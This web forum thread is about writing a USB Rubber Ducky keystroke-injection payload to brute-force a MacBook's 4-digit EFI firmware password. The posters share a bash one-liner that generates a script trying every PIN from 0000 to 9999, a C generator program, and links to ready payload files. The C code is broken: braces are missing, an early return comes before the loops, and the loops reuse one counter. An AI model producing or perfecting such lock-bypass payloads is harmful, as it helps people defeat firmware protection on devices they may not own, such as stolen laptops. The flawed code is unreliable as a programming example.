Jump to content

[Payload] [OSX] [EFI] Rubber Ducky to bruteforce macbook EFI password


Recommended Posts

Hi everyone,

I recently bought a macbook from Ebay and after having received it I formatted the hard drive to do a clean install of the OS. That's were things got a bit tricky... I can't reinstall the OS since I am prompted for the EFI password every time I attempt to boot from a CD or a bootable usb key. Neither I or the previous owner know the password and Apple wants to charge me a fait bit of money to recover it.

I've done some research, and it seems possible to brute force the password which is most likely a 4digits pin code. I decided to use the rubber ducky to create a payload similar to the one Darren uses to hack the pin of an android phone but I haven't had much luck so far.

The laptop seems to recognise the ducky as an external keyboard but doesn't type the full pin and only a single digit ends up being typed. I reckon it's pretty much the same problem than this user ran into :


I've done a fair bit of research and it seems that people wanting to bruteforce the EFI password mostly use the teensy development board. I'm pretty sure that the ducky is perfectly capable of doing the same thing and I would like to use this thread to come up with a payload that everyone can use to bruteforce mac EFIs.

I have noticed that a few people have already posted on this forum about this issue (see link bellow) but no one has posted a working payload yet.


This is the non working payload I have been using so far, any help would be greatly appreciated :rolleyes:

DELAY 5000

DELAY 10000
DELAY 10000
DELAY 10000


Useful link.


Edited by anto0522
Link to comment
Share on other sites

  • 2 weeks later...

I too am looking for help on this, I just ordered a teensy 3.1 because its already supported. I wish i was smarter to be able to get the ducky to do this, I am new to the ducky, i love it i also just need some guidance. Maybe Darren has some insight would be awesome.

Link to comment
Share on other sites

i modified the original android script so that there is only one enter and not two. I think to make this work it needs to have a pause between keystrokes its trying to type to fast I believe. Here is the modified script so that one enter is placed instead of two

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

I dont know what to change from here but what i believe would need to happen is lets say 500ms delay between keystrokes so for pin 0000 would need to be ENTER 0 DELAY 500ms ENTER 0 DELAY 500ms ENTER 0 DELAY 500ms ENTER and so on. Does anyone know how to write this script so we can give this a shot?


Link to comment
Share on other sites

  • 1 month later...


i wrote a small c program to generate a textfile that i translate via online-encoder.


int main() {
	FILE *datei;

  	datei = fopen("test.txt", "w");

  	if (datei == NULL)
		printf("Fehler beim oeffnen der Datei.");

    	return 1;
	fprintf(datei, "DELAY 5000\n");
	int i;
	for(i=0; i<10; i++) {
	fprintf(datei, "STRING 0\nDELAY 700\nSTRING 0\nDELAY 700\nSTRING 0\nDELAY 700\nSTRING %i\nDELAY 700\nENTER\nDELAY 12500\n", i);
	for(i=10; i<100; i++) {
	fprintf(datei, "STRING 0\nDELAY 500\nSTRING 0\nDELAY 500\nSTRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i);
	for(i=100; i<1000; i++) {
	fprintf(datei, "STRING 0\nDELAY 500\nSTRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i);
	for(i=1000; i<10000; i++) {
	fprintf(datei, "STRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i);
	return 0;

what i realized too is that you have to put in digit by digit, STRING 0001 ENTER is way too fast!

I keep playing around with the different delays, by now my payload is able to run about two hours broodforcing an mbair but then something seems to go wrong cauz it only enters three digits after running two hours... i also realized theres differences between a macbook retina and a macbook air.

i attached the .txt and .bin of my payload - if anyone is in intrested or has an idea i would love to figure out whats the problem!

and a small video of the stick of the ducky starting to attack^^


so long,


payload (txt): http://www47.zippyshare.com/v/tXyo9I7o/file.html

payload (bin): http://www47.zippyshare.com/v/8OKsSeUy/file.html

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...